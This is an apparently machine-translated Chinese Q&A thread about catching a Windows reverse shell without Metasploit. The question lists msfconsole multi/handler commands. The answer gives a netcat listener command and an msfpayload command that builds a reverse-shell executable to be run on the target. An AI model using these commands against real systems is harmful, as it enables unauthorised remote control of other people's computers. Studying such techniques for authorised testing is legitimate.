0

对不起我的英语不好。使用 metasploit,我生成了一个带有 windows/shell/reverse_tcp 有效负载的 windows 7 漏洞利用。然后我使用 msfconsole 等待连接:

use exploit/multi/handler
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.182.129
set LPORT 4444
exploit

我已成功连接到 Windows 命令行。但是我需要在不使用 metasploit 的情况下进行连接。我找到了如何创建独立模块,但这只是为了利用。我需要独立的多/处理程序 reverse_tcp 或只是侦听某个端口然后允许访问命令行的代码。

4

1 回答 1

0

我真的不知道你的约束/限制是什么。
我的猜测是,您想在没有安装 metasploit 的计算机上“接收 shell”。
如果是这种情况,您可以使用msfd(安装在另一台计算机上的metasploit 守护程序)或简单地使用 netcat,socat,...

您对此有何看法:

  • 在 192.168.1.2 上用 netcat 收听
    # nc -l -p 4444
  • 改用shell_reverse_tcp _
    # msfpayload windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 X /root/darkbird.exe
  • 在目标上执行 darkbird.exe
于 2015-11-06T13:01:22.097 回答